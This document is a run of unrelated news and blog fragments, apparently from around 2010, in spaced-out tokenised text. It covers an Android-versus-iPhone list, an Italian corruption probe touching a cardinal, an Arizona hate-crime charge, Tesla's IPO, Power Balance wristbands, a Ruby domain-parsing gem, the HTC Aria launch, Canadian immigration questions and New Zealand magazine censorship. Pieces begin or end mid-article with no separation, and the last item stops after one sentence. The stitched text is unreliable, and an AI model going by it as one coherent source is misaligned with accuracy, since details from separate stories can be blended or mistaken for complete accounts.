You can pick the color , either black or white , and you get to choose between the 16GB or the pricier 32 GB version .
Other than that , you 're stuck with the 3.5 - inch , 320x480 pixel display , 256MB of RAM , and 600MHz processor .
Because Android is an open platform , manufacturers have the freedom to pair it with any hardware they want , like the Nexus One ( with 3.7 - inch , 480x800 pixel display , 512MB of RAM , and 1GHz Snapdragon processor ) or the Motorola Droid which has a physical keypad .
Obviously , available selections will vary by carrier - speaking of which ....
6 : Android Lets You Choose Your Carrier
Advertisement
AT&T truly is the iPhone 's weakest link .
The iPhone 's success turned the country 's fastest 3G network into a staggering mess of dropped calls and dodgy data connections .
If you lust after an iPhone and live in an area with poor AT&T coverage , you 're stuck struggling with low signal quality , slow data speeds , and missed calls .
Android devices are available on every major cellular carrier ( although AT&T only offers a single , somewhat underpowered , Android phone ) .
Verizon has the Motorola Droid , Droid Eris , and Droid Incredible to start .
T - Mobile has the Nexus One , MyTouch 3G , Behold II , and will soon carry the MyTouch Slide .
And Sprint has the Hero , Moment , and plans for the very promising Evo 4G .
No matter where you live , Android lets you pick the carrier that 's best for you .
7 : Android Lets You Install Custom ROMs
Advertisement
The iPhone can be Jailbroken for some additional functionality , like installing apps that are n't available in the App Store , but the overall experience is the same .
You 're still stuck with the same exact interface .
Similar to the Jailbreaking movement , Android has a small community dedicated to building custom ROMs for Android devices .
Not only do Custom ROMs bring the same functionality Jailbreaking does , but they also bring an additional level of customization to your phone .
There are ROMs that port custom UIs from one device to another .
Other ROMs strip down bulky features and optimize for speed .
With Android , nothing is out of reach .
8 : Android Lets You Change Your Settings Faster
Advertisement
Smartphones have been gaining more and more functionality over the past few years : Wi -Fi , GPS , 4G , Bluetooth , etc .
While these are all great and necessary additions , they have very adverse affects on battery life .
In attempts to counter poor battery life , users have taken to toggling system settings like turning on Wi-Fi or 3G on only when they are needed .
iPhone users are stuck digging around in the system settings every time they want to use the internet or a Bluetooth device .
Android lets you use widgets to manage your settings directly from your home screen - and for those lesser - used settings that might not have dedicated widgets , you can also create shortcuts on your home screen to take you directly to the setting you want to change .
9 : Android Does Google and Social Integration
Advertisement
With Smartphones giving us constant connectivity , it 's not surprising that the majority of our computerized lives are moving online .
We have email for our messages , Flickr for our photos , Google Docs for our documents , and Facebook and Twitter for our social lives .
Android offers the ability to integrate all of this natively .
Your Gmail account can be automatically synchronized with your phone .
Photos taken with your phone can be automatically uploaded to Flickr .
Your phone can even be linked to your Facebook account and can sync your phone contacts with your Facebook friends - complete with profile images , email addresses , and phone numbers .
The iPhone can do this only through use of third party apps , and is nowhere near as seamless to use as the Android alternative .
10 : Android Gives You More Options to Fit Your Budget
Advertisement
If you 've ever thought about buying an iPhone , you have probably noticed the price tag .
The older iPhone 3G costs $ 99 with a two - year commitment and performs sluggishly with the latest OS updates when compared to the 3GS ( which will run you a whopping $ 199 with two - year agreement ) .
Because Android is an open source platform , it is very cost effective to implement which means savings for the end user .
Every major cellular carrier ( except for AT&T ) has at least one Android phone available free with two - year agreement .
Of course these are lower end Android devices , but they are still comparable in performance to the iPhone 3GS .
The most expensive Android phones ( which significantly outperform the iPhone 3GS ) are $ 199 with two - year contract .
Advertisement
Maximum PC brings you the latest in PC news , reviews , and how - tos .
ROME ( Reuters ) - One of Italy ’s most prominent Catholic cardinals and a former minister have been put under investigation as a corruption scandal that has tainted the government spread to touch the Vatican .
Magistrates told Cardinal Crescenzio Sepe and Pietro Lunardi , former infrastructure and transport minister in the center - right government , they were being investigated for aggravated corruption , judicial sources said .
The magistrates in the central city of Perugia are investigating a web of corruption and favors involving public works contracts , mostly in construction for major events , such as last year ’s G8 summit and the millennium celebrations .
Sepe , 67 , is being investigated for alleged corruption when he was a Vatican official running the Congregation for the Evangelisation of Peoples , a cash - and - real - estate - rich department of the Vatican that finances the work of missions abroad .
Sepe , who ran the department until he was moved to Naples in 2006 , is suspected of aggravated corruption with Lunardi in connection with a real estate deal .
According to Italian newspapers La Stampa , Corriere della Sera and La Repubblica , Lunardi bought a building in Rome from Sepe ’s department in 2004 at a price well below market value .
The next year , when Lunardi was minister , he approved a decree allocating funds for the restoration of historic church buildings , including the 16th century headquarters of the mission department facing Rome ’s Spanish Steps .
CARDINAL WILL COOPERATE
In a statement , the Vatican said it hoped the situation “ could be cleared up fully and rapidly in order to eliminate any shadows , be they on the person ( Sepe ) or Church institutions . ”
It said Sepe would cooperate with magistrates but proper procedures had to be used as the Vatican is a sovereign state .
The Vatican appears to be taking a tack of transparency to avoid a repetition of a showdown with Italy in 1982 , when it refused to cooperate with magistrates investigating the Vatican Bank ’s role in the fraudulent bankruptcy of the Banco Ambrosiano .
Sepe , mobbed by reporters as he was leaving a church in Naples on Sunday , said : “ The truth will emerge ... I am serene . ”
In an interview with Corriere della Sera , Lunardi said he would see magistrates in Perugia soon “ to clear everything up . ”
The Perugia investigation has claimed the head of Claudio Scajola , a close ally of Prime Minister Silvio Berlusconi , who resigned as industry minister in May .
Scajola resigned after it was found 900,000 euros ’ worth of cashier checks used to buy his luxury Rome apartment overlooking the Colosseum came from a constructor arrested in the political corruption probe .
He denies any wrongdoing .
The corruption scandal exploded in February when police arrested four people including Angelo Balducci , the former head of the government department that oversees public works and a construction consultant to Sepe ’s missions department .
Balducci and the others were accused of orchestrating a web of corruption and kickbacks among constructors , architects and civil servants who managed tens of millions of euros of public works contracts .
Balducci is in jail in Rome .
Magistrates have turned down requests for him to be placed under house arrest .
A month after he was arrested , a new scandal involving Balducci and the Vatican blew up when wiretaps implicated him and a member of a Vatican choir in a male prostitution ring .
After that scandal , Balducci was dismissed from an elite volunteer corps called “ Gentlemen of His Holiness , ” ushers who serve in the Vatican ’s Apostolic Palace on major occasions such as when the pope receives heads of state .
Friday , the Arizona Republic reported that the last month ’s shooting of Juan Varela has been deemed a hate crime by the Maricopa County Attorney ’s Office .
Arizona resident Gary Thomas Kelley has also been charged with second - degree murder in association with Varela ’s death .
According to witnesses , Kelley called Varela a “ wetback ” and shouted , “ hurry up and go back to Mexico or you ’re gonna die ” before shooting Varela in the neck .
Ironically , Varela was a third - generation , native - born U.S. citizen .
Yet , what ’s even more troubling is the timing of the murder .
Varela was shot just a little over a week after Arizona ’s controversial immigration bill , SB - 1070 , was signed into law .
Initially , the Phoenix Police Department spokesman , Officer Luis Samudio , insisted that the shooting was not a hate crime .
The Phoenix Police Union has also been a vocal supporter of SB - 1070 .
Robert Shutts , homicide bureau chief for the Maricopa County Attorney ’s Office , would n’t comment on whether SB - 1070 was a factor in the case .
However , Varela ’s family has believed all along that the shooting was a hate crime and that SB - 1070 is at least partly to blame .
A week after the murder , Varela ’s family called on Gov. Jan Brewer ( R - AZ ) to “ take responsibility for this hostile atmosphere they have created . ”
Following the announcement of the new hate crime charge , the family ’s spokesperson told an Arizona local news station , “ these pundits have really escalated this …to this point .
Somebody has to do something to tone this down .
It ’s really out of control . ”
Watch the Varela family ’s reaction :
At this point , it ’s difficult to verify what role , if any , SB - 1070 played in Varela ’s death .
However , chances are the law has made an already toxic atmosphere worse .
A growing number of Latinos are already the targets of discrimination and hate crimes in the U.S. SB - 1070 has only exploited the public ’s frustration with federal government inaction and played to their worst instincts .
It ’s brought neo -Nazis out .
It was followed by the passage of a law banning ethnic studies and proposed legislation that seeks to overturn the 14th Amendment .
Perhaps most significantly though , it has pitted Latinos against their lighter - skinned neighbors .
Regardless of what motivated Kelley to shoot Varela , the fact is that the Varelas and Latinos in general feel threatened by SB - 1070 .
Perception alone is enough to divide Arizona in half .
And in the end , if Kelley is found guilty of committing a hate crime , it will be difficult to dispute that the charged discourse surrounding the very recent passage of SB - 1070 played no role in the violence committed against a Latino Arizona resident .
Andrea Christina Nill
Reposted with permission from The Wonk Room .
The man nominated as Democrats ' candidate for Senate in South Carolina might have been a " plant , " a high - ranking Democrat suggested Thursday .
House Majority Whip James Clyburn ( D - S.C. ) called for South Carolina to investigate the circumstances that led to Alvin Greene winning the Democratic Senate primary in his state earlier this week .
" There were some real shenanigans going on in the South Carolina primary , " Clyburn said during an appearance on the liberal Bill Press radio show .
" I do n't know if he was a Republican plant ; he was someone 's plant . "
The third - ranking House Democrat said he found it strange that Greene , a relative unknown prior to Tuesday , was able to produce the money to register and run for Senate despite being unemployed .
Greene allegedly tried to pay the registation fee in cash , and Clyburn said he wondered whether an outside party might have funded both the fee and Greene 's campaign , in violation of federal campaign finance laws .
Despite having no real campaign or prior political support in the state , Greene won the primary to face Sen. Jim DeMint ( R - S.C. ) this fall with nearly 59 percent of the vote — almost 100,000 votes .
The South Carolina Democratic Party called on Greene on Wednesday to drop out of the race after The Associated Press reported that the candidate is facing felony charges for having allegedly displayed pornographic images to a college student .
Adding to the pressure on Greene was Clyburn 's call for a probe to look at the possibility that an outside party might have funded Greene 's campaign beyond legally permissible limits , and without having disclosed the source of those payments .
He also called on the U.S. attorney in the state to investigate Greene 's alleged felony .
" I would hope the U.S. attorney down there would look at this , " Clyburn said about Greene 's qualifications for the ballot , also pointing to Greene 's having allegedly tried to pay the fee to run for Senate in cash , despite being unemployed .
" I think there 's some federal laws being violated in this race , but I think some shenanigans are going on in South Carolina , " Clyburn explained .
" Somebody gave him that $ 10,000 and he who took it should be investigated , and he who gave it should be investigated . "
Updated 11:42 a.m .
The long awaited Tesla Motors initial public offering has been set for June 29th with 11.1 million shares up for grabs at a price of $ 14 to $ 16 per share , the total revenue from the sale will be up around $ 178 million USD .
Tesla has not yet turned a profit and is not expected to until the second year of production of the Tesla Model S sedan , in 2013 .
In spite of that the heat surrounding this company is blistering and with deals in place with both Toyota and Daimler it is safe to say that Tesla is n’t an automotive flash in the pan .
The shares will be offered under the name TSLA and will be listed on the NASDAQ , Tesla also reiterated its plans for a 3rd electric vehicle to accompany the Roadster and Model S , this 3rd model will be far more affordable and Tesla expect to produce the car in far larger volumes .
“ We intend to offer this vehicle at a lower price point and expect to produce it at higher volumes than our planned Model S , ” the company said .
“ We expect that this vehicle will be produced a few years after the introduction of the Model S. ”
Will you be buying TSLA shares ?
We are hoping to pick some up , if for no reason other than to put our money where our mouth is .
TOKYO ( Reuters ) - Tokyo screenings of “ The Cove , ” an Oscar - winning documentary about a grisly annual dolphin hunt have been canceled over planned protests by conservatives who say the film is anti-Japanese , the distributor said on Saturday .
The film , which picked up an Oscar for best documentary feature this year , follows a group of activists who struggle with Japanese police and fishermen to gain access to a secluded cove in Taiji , southern Japan , where dolphins are hunted .
Directed by former National Geographic photographer Louie Psihoyos and featuring Ric O’Barry , a former dolphin trainer from the “ Flipper ” television series , “ The Cove ” has prompted activists to threaten street demonstrations .
Planned showings of the film at two cinemas in Tokyo this month have been canceled because of fears the protests might inconvenience movie - goers and others , according to Unplugged , the Japan distributor .
Screenings at one Osaka theater have also been called off , but Unplugged is still in negotiations to show the movie at 23 venues around the country this summer , said a spokeswoman for the company , who asked not to be named .
Unplugged has received threatening phone calls and protesters have gathered outside its offices , she said .
“ ‘ The Cove ’ is absolutely not an anti-Japanese film , ” Takeshi Kato of Unplugged said in a faxed statement .
“ I believe a deep and constructive debate is needed about the content of the film . ”
O’Barry , who is set to visit Japan from June 8 , said Japanese film - goers should be allowed to see the documentary .
“ It ’s not right that a small minority of extremists could take this right away from them , ” he said in a statement .
“ To do so is a clear threat to democracy . ”
The film was shown at the Tokyo International Film Festival last year , but has yet to be made widely available to the public .
Japan ’s government says the hunting of dolphins and whales is an important cultural tradition .
New Zealander Pete Bethune is currently on trial in Tokyo for boarding a Japanese vessel in an attempt to stop the annual whale hunt in the Antarctic .
Arkansas man attempting to walk across the country carrying a 12 - foot cross “ as a reminder of Jesus Christ and what he did for us all ” ( Click image for story and video )
However , it 's not just sports stars who are accessorising with the bands .
Actor Russell Crowe was openly wearing one when he visited Marysville three weeks ago to discuss a building project for the bushfire - stricken town .
Power Balance says the holograms on either side of the wrist react with the body 's energy flow and tune its frequency to the ideal 7.83 hertz required to power the body .
The Australian Medical Association , however , yesterday dismissed this alleged benefit as ' ' biologically implausible ' ' and suggested the advertising regulator should investigate the claim .
Power Balance 's Tom O'Dowd says if the bands - which are said to increase an athlete 's core strength and power by up to 500 per cent - did n't work , people would n't wear them .
Mr O'Dowd said about half the players in the AFL and the NRL now use them , but spokesmen for both codes could not confirm this .
High - profile players who proudly sport the bands include the Brisbane Lions ' Brendan Fevola , a product ambassador paid to wear one , and the NRL's Benji Marshall .
The players are reluctant to explain why they use them but sports psychologists say the bands have a placebo effect - the players think the bands will improve their performance on the footy field , so they feel more confident and play better .
The AFL's Patrick Keane says the code has no problem with players wearing the bands as long as they are not a danger to other players .
'' The view of our medical commissioners is that they have no issue with them , '' Keane said .
'' If the players think they 're getting some sort of benefit , that 's fine .
There 's no performance enhancing rules that they 're breaking . ''
The Sunday Age understands the AFL 's medical staff do not believe the bands can turn ordinary men into super humans .
And the two men who would best be able to shed some light on any transformative powers the bands may have , Riewoldt and Fevola , declined to discuss their new wrist accessories with The Sunday Age .
According to a Brisbane Lions insider , Fevola swears by the bands and has been trying to convince a number of his teammates to try them .
A Tigers spokesman said Riewoldt had only recently decided to experiment with the band and it was too early for him to talk about its affect on his strength .
He planned to wear one again last night against Fevola 's side , the Brisbane Lions .
Australian Medical Association vice - president Steve Hambleton said the bands were ' ' biologically implausible ' ' .
'' My suspicious antenna goes up immediately when you hear the claims being made about these wristbands , '' Dr Hambleton said .
'' My first feeling is that no one is going to believe it .
'' Surely the advertising laws in this country would have the regulators wanting to take a look at these claims to see if they are real . ''
A federal Health and Ageing Department spokeswoman said the bands were not registered with the Therapeutic Goods Administration because they did not meet the definition of a medical device or therapeutic good .
However , Mr O'Dowd who refused to release sales figures for the bands , believed to be in the tens of thousands , said about 30 per cent of sales were to the medical profession , mainly osteopaths and chiropractors .
Mentone chiropractor Dr Matthew Bateman said from his experience with the product , which comes with a 30 - day money back guarantee , many clients felt an ' ' amazing benefit ' ' from wearing it .
Developed in California , the bands went on sale in Australia in August last year for $ 59.95 and have become popular through clever marketing .
Not only are several of the world 's top athletes paid to wear them , Power Balance has poured money into different sports through sponsorships to lift its profile , and has posted videos on YouTube showing wristband users growing stronger .
People would stay upright when pushed and turn further around than they thought they could when wearing the band .
However , Australian Skeptics spokesman Richard Saunders said this was just a trick using applied kinesiology which relies on the way muscles react to forces in different directions .
He said the bands had no real beneficial effects at all .
'' There is no science behind them , '' Mr Saunders said .
'' It 's a bit of plastic and two holograms which reflect light .
It does n't have magical powers . ''
He said spending $ 60 on something that should cost $ 3 was a waste of money .
The NSW rugby league team probably agrees with him .
It requested a box of 40 wristbands before last Wednesday night 's State of Origin clash with Queensland .
NSW lost 34 - 6 . NRL spokesman John Brady said medical staff had approved their use but he did not know how many players wore them on the night .
He said the product was not endorsed by the NRL or any club .
Power Balance is a sponsor of both the West Tigers and St George Illawarra .
Surfing Australia 's website has a link to the Power Balance website , which promotes an exclusive Surfing Australia aqua and white colour wristband .
For every band sold , $ 20 is donated to Surfing Australia .
Surfing Australia 's high performance centre manager , James Egginton , said the deal with Power Balance was brokered about six weeks ago but the surfing organisation had yet to receive any money .
Mr Egginton said a number of top surfers , including Andy Irons , had endorsed the product but he could not say if Surfing Australia believed in the band 's powers .
Reigning world champion Mick Fanning trialled the band in March when competing at the Quiksilver Pro on the Gold Coast and suffered a shock third round loss to fellow Australian Kai Otton .
Fanning 's manager , his mum Liz , said the Power Balance distributors wanted to sponsor Mick to wear the band all the time but he decided against it .
'' He did n't have any negative things to say about the product .
He found it helpful but preferred to wear it when training and not in the water , '' Mrs Fanning told The Sunday Age .
Mick Fanning was in Indonesia last week and could not be contacted .
POWER BALANCE WRISTBAND USERS Brisbane Lions ' Brendan Fevola
Richmond Tigers ' Jack Riewoldt St Kilda's Nick Riewoldt Wests Tigers NRL player Benji Marshall Parramatta's Timana Tahu St George Illawarra's Matt Cooper
Jockey Damien Oliver Wallaby James O'Connor Surfer Andy Irons Real Madrid's Cristiano Ronaldo Basketballer Shaquille O'Neal
F1 driver Rubens Barrichello Actor Russell Crowe The Biggest Loser trainer Shannan Ponton
Have you ever found yourself looking for a solution to parse or validate a domain name ?
Probably , you spent several hours trying to find the most efficient and comprehensive regular expression , but the more examples you found , the more you realized that the final solution does n't seem to exist .
And you are right .
There is no algorithmic method of finding the highest level at which a domain may be registered for a particular top - level domain ( the policies differ with each registry ) , the only method is to create a list of all top - level domains and the level at which domains can be registered .
This is the aim of the effective TLD list .
Here comes the Public Suffix List .
What is the Public Suffix List ?
The Public Suffix List is a cross-vendor initiative to provide an accurate list of domain name suffixes .
The Public Suffix List is an initiative of the Mozilla Project , but is maintained as a community resource .
It is available for use in any software , but was originally created to meet the needs of browser manufacturers .
A " public suffix " is one under which Internet users can directly register names .
Some examples of public suffixes are " .com " , " .co.uk " and " pvt.k12.wy.us " .
The Public Suffix List is a list of all known public suffixes .
Does it work with Ruby ?
Yeah !
Public Suffix Service is a Ruby domain name parser based on the Public Suffix List .
To use it you do n't need to download the list or learn how it works .
Just install the Gem and you 're done .
$ gem install public_suffix
Here 's a few examples :
# parse a very standard domain name domain = PublicSuffixService . parse ( " google.com " ) domain .
tld # => " com " domain .
domain # => " google " domain .
subdomain # => nil # parse a less standard domain name domain = PublicSuffixService . parse ( " google.co.uk " ) domain .
tld # => " co.uk " domain .
domain # => " google " domain .
subdomain # => nil # it works with subdomains too domain = PublicSuffixService . parse ( " www.google.co.uk " ) domain .
tld # => " co.uk " domain .
domain # => " google " domain .
subdomain # => " www "
Domain validation
The Public Suffix Service library offers a quick way to validate a domain .
PublicSuffixService . valid ? ( " google.com " ) # => true PublicSuffixService . valid ? ( " www.google.com " ) # => true
The main difference compared with the regular expression based solutions is that this library actually validates the domain against a white / black list instead of running a soft check on the TLD size .
PublicSuffixService . valid ? ( " google.xx " ) # => false PublicSuffixService . valid ? ( " google.zip " ) # => false
Domain transformation
The PublicSuffixService : : Domain class provides a bunch of methods to validate and transform a domain name .
domain = PublicSuffixService . parse ( " www.google.com " ) domain .
domain ?
# => true domain . is_a_domain ?
# => false domain . is_a_subdomain ?
# => true domain .
subdomain # => " www.google.com " domain .
domain # => " google.com "
Who uses the Public Suffic List ?
The list is used by well known browsers such as Google Chrome , Mozilla Firefox and Opera .
The Public Suffix Service Ruby library was created for RoboDomain and it has been used in production since November 2009 .
I 've seen the PlayStation 3 compared to a lot of things in my lifetime , from a grill to a brick and everything in between .
But a GameCube ?
That 's new .
Advertisement
In an interview with 5BY5 , Valve boss Gabe Newell has spoken of his company 's decision to release online gaming platform Steam for the Mac , and why that makes sense , but releasing games for the PS3 does not .
Advertisement
This hate - hate relationship has gone beyond mere entertainment for the fanboys in the peanut gallery .
It 's getting more useful just as a guide to how much money Valve makes , when it can afford to not just abandon a platform to the wind , but delight publicly in doing so .
Episode 16 [ 5BY5 , via VG247 ]
Whilst all eyes are on the World Cup , there was a cracking goal scored in the Swedish second division yesterday .
Forget the action in the World Cup , there was an incredible goal scored in the Swedish second division ( Superettan ) yesterday .
To set the scene , Hammarby had just taken the lead at Syrianska from the penalty spot when Linus Hallenius picked the ball up on the left side of the box .
Perhaps stunned by this Marco van Basten - esque goal , there was no more scoring and Hammarby won the match 2 - 0 .
Just imagine the hype if this goal had been scored at the World Cup !
Hallenius could well be a striker to keep an eye on .
At just 21 , he is a first choice striker for Hammarby and has scored three goals now in just two games this season .
Related links :
The Top 5 goals of the Week
We 've seen leaked pics and specs for HTC 's latest touchscreen Android phone , but AT&T just made it official .
A clearer shot of the HTC Aria we saw last week has surfaced , however it sounds like the phone has …
This is a pretty small phone compared to the gigantic Android phones we 've been seeing lately , with a 3.2 - inch screen that 's over an inch smaller than the Evo's 4.3 - incher .
It also comes stocked with a 5 MP camera .
Unfortunately , it 's shipping with Android 2.1 with HTC's Sense skin rather than 2.2 .
The phone is dropping on 6/20 for $ 120 ( after a $ 100 mail - in rebate , boo ) .
Pocket - Sized HTC Aria to Premiere on Nation 's Fastest 3G Network
Android 2.1 & HTC Sense™ Experience Combined With 7.2 HSPA Speeds Offers Exceptional Mobile Broadband Performance
Dallas , Texas , Bellevue , Washington , June 14 , 2010
newsrelease
ShareThis
AT&T * and HTC Corporation ( " HTC " ) today announced that HTC Aria™ , a rich and powerful addition to AT&T's Android smartphone portfolio , will be available exclusively at AT&T beginning June 20 .
Pocket - sized and packing the power of the Android 2.1 platform , a five megapixel camera and a bright 3.2 inch HVGA display , HTC Aria offers AT&T customers Android smartphone functionality in an amazingly easy - to - carry design .
The combination of 3G speed , a responsive capacitive touch screen and an optical joystick makes HTC Aria an ideal smartphone for mobile broadband .
HTC Aria is Wi-Fi capable and qualifying customers will receive access to AT&T Wi-Fi , with more than 20,000 hotspots across the U.S.
In addition , HTC Aria is compatible with AT&T's High Speed Packet Access ( HSPA ) 7.2 Mbps technology .
This technology provides a considerable boost to 3G speeds when combined with expanded backhaul .
The combination of faster wireless networks , smartphones like HTC Aria , and tens of thousands of available innovative mobile apps allows AT&T customers to mobilize virtually everything , from video and music , to social networking , to business applications .
" HTC Aria is the first of several smartphones in our Android portfolio to run the 2.1 platform , " said Jeff Bradley , senior vice president , Devices , AT&T Mobility and Consumer Markets .
" When you combine the nation 's fastest 3G network , and access to the nation 's largest Wi -Fi network , HTC Aria will be one of the best Android smartphones available . "
HTC Aria features the acclaimed HTC Sense experience , which automatically delivers the most - wanted information by bringing it to the forefront of the mobile experience .
Featuring the latest version of HTC Sense , HTC Aria offers even more ways to stay connected , including Friend Stream , which delivers Facebook , Twitter and Flickr updates in a single , consolidated view .
" Its unique combination of compact size and beautiful design instantly separates HTC Aria from the pack of ‘ me - too ' smartphones , " said Jason Mackenzie , vice president of HTC America .
" But what really differentiates HTC Aria from other smartphones is the acclaimed HTC Sense experience , which we are pleased to be bringing to AT&T customers .
By putting people at the center of everything it does , HTC Aria organizes all of your communications in the most human way possible – by person . "
A full selection of the newest and most popular Google services can be accessed with HTC Aria .
This includes Google search , Google Maps , Google Navigation , Gmail , YouTube and more .
With Android Market , customers can also choose from more than 50,000 applications to further personalize the mobile experience .
Along with being ultra - small at just over 4 inches long and weighing a mere 4.05 ounces , HTC Aria 's seamless wrap - around soft - touch back cover eliminates sharp edges , making HTC Aria exceptionally convenient to carry and comfortable to hold as well .
Featuring the best selection of smartphones and OS , AT&T is ranked # 1 in customer satisfaction among smartphone owners .
AT&T plans to expand its Android portfolio to include other Android smartphones during the second half of 2010 .
Pricing and Availability
HTC Aria will be available on June 20 at AT&T retail locations nationwide or at http://www.att.com/wireless for $ 129.99 after $ 100 mail - in rebate ( pay $ 229.99 and after mail - in rebate receive $ 100 AT&T Promotion Card .
Two - year agreement required and smartphone data plan required ) .
Welcome to my new series , “ How to immigrate to Canada “ !
I recently received quite a lot of emails , asking me questions about the immigration process .
So I decided to explain the whole process in 10 posts , which will be published every Saturday .
I also encourage you to ask any question you may have .
I ’m not an immigration consultant , but from experience , I may be able to point you to the right direction !
In the series , we will see the different options you have to come to Canada , as well as your rights and duties as a Permanent Resident , what happens after you arrive etc .
Here are the answers to the ten most common immigration questions .
I hate living in my country , I ’m desperate to come to Canada
I often receive emails that basically explain that .
This is a tough one : as much as I can sympathize with someone living in a country at war , or with a lot of economic problems , there is no perfect answer .
Canada does welcome refugees .
However , the situation has to be pretty severe in your home country : the applicant must “ have been , and continue to be , seriously and personally affected by civil war or armed conflict , or have suffered massive violations of human rights “ .
This is not always easy to prove …
If you do n’t fit in the refugee category , you may apply in one of the many immigration categories .
I do n’t have enough point to immigrate through the skilled worker category
In order to immigrate in the skilled worker category , you must meet the minimum pass mark .
You can use the free eligibility tools to see if your application would be eligible to be processed .
For those who plan to settle in Quebec , take the test here , for those who plan to settle anywhere else , it ’s this test .
If you do n’t pass the test , it ’s not the end of the world !
Do n’t send your application , because it wo n’t be processed .
Instead , take some time to see if you can improve your chances of being selected .
The selections factors ( education , language abilities , experience , age , arranged employment and adaptability ) can usually be improved .
Focus on taking some French or English classes , improve your work experience or take a trip to Canada .
These can help you get more points !
And do n’t worry too much about finding a job in Canada before immigrating .
This is every immigrants ’ dream but it is notoriously difficult and CIC knows it … this is probably why you only get a maximum of ten points for it !
Am I too old to immigrate ?
This is a touchy question .
To immigrate in the skilled worker category , you get the most points between 21 and 49 years old .
This is because Canada needs immigrants who will work , pay taxes , have children … and wo n’t retire too early .
Studies probably showed as well that younger immigrants are more adaptable overall .
Cynical ?
Not really .
Immigration meets a need after all .
If you are over 50 , it ’s not the end of the world .
Some people managed to obtain the permanent residence , albeit with a lot of motivation and a strong plan .
It is your job to show that you want to live in Canada , and that you are aware of the problems you may face .
What ’s the best way to immigrate in Canada fast ?
In short , in you are in a hurry to leave your country for whatever reason , do n’t apply for permanent residence .
No matter how loud you complain , processing your application will take a while : 6 to 12 months if you are lucky , much longer if you are not .
This is just the way it is !
Take a second and think of it : Canada must evaluate whether you fit in the category you applied in , check your background , your medical results etc. in order to grant you the right to live in Canada .
This is quite a responsibility !
There are some basic advices to make you your application gets processed as fast as it can , and to avoid any delays .
But that is the best you can do !
On a side note , stay clear of any organization that promises a faster process .
Nobody has this power .
Is it faster if I immigrate to Quebec ?
This is a strong myth among the francophones .
Because Quebec is French , a lot of applicants think it can be much faster to go through the Quebec process ( which is a slightly different one ) .
However , be aware that immigrating through Quebec adds an additional step : the CSQ ( Certificat de Sélection du Québec ) .
Besides , waiting times are also long for Quebec now … so no , it ’s not really faster .
Make your life easier .
If you plan to settle in Quebec , apply through Quebec .
If you plan to settle anywhere in Canada , do n’t bother applying through Quebec and go through the regular process .
If I marry a Canadian citizen , will I be Canadian automatically ?
The stronger myth ever …!
In short : no , absolutely not .
This is a common immigration myth .
First of all , to be eligible to become a Canadian citizen , you must have been a permanent resident first .
There are some exceptions , like if you are adopted — but I do n’t think this is the most common case !
Second , to be married to a Canadian citizen does not give you the right to come to Canada , much less live , work or study there .
You may however be eligible to be sponsored by your spouse ( the sponsorship category ) .
I was told to come for an interview , what it is about ?
It is fairly common to be required to meet with a Citizenship and Immigration Canada Officer .
During the interview , the officer will typically check your credentials , test your language abilities and evaluate your chances to establish yourself successfully in Canada .
This may be a chance for you to present a strong immigration project , as the officer may possess wide discretionary authority to accept you even if you lack a few points to qualify .
If you applied in the family class ( i.e. you are sponsored by a spouse ) , the officer will focus on evaluating whether the union is genuine or is a marriage or convenience .
Questions will be asked about your relationship with your spouse : where did you meet , how did the relationship develop etc .
In any case , make sure you prepare your interview because this could be your chance to be accepted !
How do I apply for citizenship ?
To apply for citizenship , you must first be a permanent resident .
You are eligible after three years of permanent residence , and 1095 days of physical presence in Canada .
Applying for citizenship is relatively easy compared to applying for permanent residence .
However , it involved a little bit of paperwork , a test and a sometimes long processing time !
My application was refused , what do I do now ?
If your application is refused , you will be given a reason , such as not enough points because of lack of work experience , work experience not on the Canadian National Occupational Classification , lack of language skills etc .
Basically , they give you something to work on , in most cases .
Being refused for security reason or because of a health problem is a much more complex problem , for which you may need specific help .
In the spouse category , the main reason for which applicants are refused is if the immigration officer believes the relationship is not genuine .
If you believe the decision was unfair , in most case , you can appeal the decision at the Immigration Appeal Division .
Otherwise , you may improve your chance of being selected ( such as getting more work experience ) and re-apply for permanent residence .
Will my life be better in Canada ?
Do n’t we all hope !
Experiences vary greatly .
Some immigrants embrace their new life , some have more trouble adapting .
Even though everybody can have the occasional frustrating experience , generally speaking , prospective immigrants should do a lot of research before they apply for permanent residence to avoid disappointment .
Typical complaints involve not being able to work in the applicant ’s field of choice ( medicine , accounting , law are tricky because your experience in your home country may not be recognized ) , difficulty finding a job , problems adapting …
A lot of these problems could be avoided by doing researches beforehand .
So , be curious before deciding to come to Canada !
​ Police in New Zealand , in a secret meeting with Internal Affairs departmental heads , told them to try to get marijuana magazines banned nationwide , official documents have revealed .
According to the documents , police hope to have NORML News completely banned , as well as High Times and Cannabis Culture magazines .
Scoop .
No decision has been made yet on censoring the magazines , reports
Police had previously lied their asses off , denying that they were involved with sending cannabis magazines to the censors .
A request by NORML New Zealand under the Official Information Act revealed the attempt to censor marijuana information .
Three issues of NORML
News were given to the censors after massive raids on indoor gardening stores , code named Operation Lime , were conducted across the country on May 7 .
A spokesperson for the Censorship unit told media at the time that there was “ nothing to suggest ” the request for a ban had come from the police .
The Secretary of Internal Affairs claimed he was just “ seeking guidance . ”
NORML News editor Chris Fowlie wrote to the Secretary of Internal Affairs under the Official Information Act , requesting any documents he held on the marijuana magazine .
Suspecting there was more to the situation than met the eye , editor Chris Fowlie wrote to the Secretary of Internal Affairs under the Official Information Act , requesting any documents he held on the marijuana magazine .
The documents arrived Thursday , revealing two police officers arranged a meeting with Internal Affairs department heads on May 31 , “ during which the existence of several publications dealing with the cultivation of cannabis and other illegal activity was discussed . ”
The names of the police officers involved have been withheld because Internal Affairs claims making the information available would “ be likely to prejudice the maintenance of the law . ”
Mmm-hmm .
Police provided to Internal Affairs a property sheet that provides a strong link to the Operation Lime raids , the documents reveal .
Police requested that the Secretary of Internal Affairs pursue a “ Serial Publication Order , ” which would mean all existing and future copies of of NORML News , High Times and Cannabis Culture magazines would be prohibited in New Zealand .
Jon Peacock , on behalf of the Secretary of Internal Affairs , requests a ban not only of the three issues submitted , but also requests “ consideration is given to issuing a serial publication order on the publication ” in a letter to his subordinates at the Censorship Office .
“ We are outraged at this blatant political interference in our campaign for sensible drug laws , ” Fowlie said .
“ Police are lying to the media and misleading the public , ” Fowlie said .
“ They should admit they are behind this censorship , rather than hiding behind the faceless grey suits of Wellington . ”
“ If the police succeed in banning NORML News , this could criminalize thousands of people who have an old copy somewhere , ” Fowlie said .
“ We have printed more than one million copies which all found happy homes , and a recall would be impossible . ”
AS THE 1970s were fading into the 1980s and punks were making way for new romantics , EMI — the record company that had brought the world The Beatles — was struggling to keep up with British pop 's ever - changing moods , and got bought up by a humble lightbulb - maker .
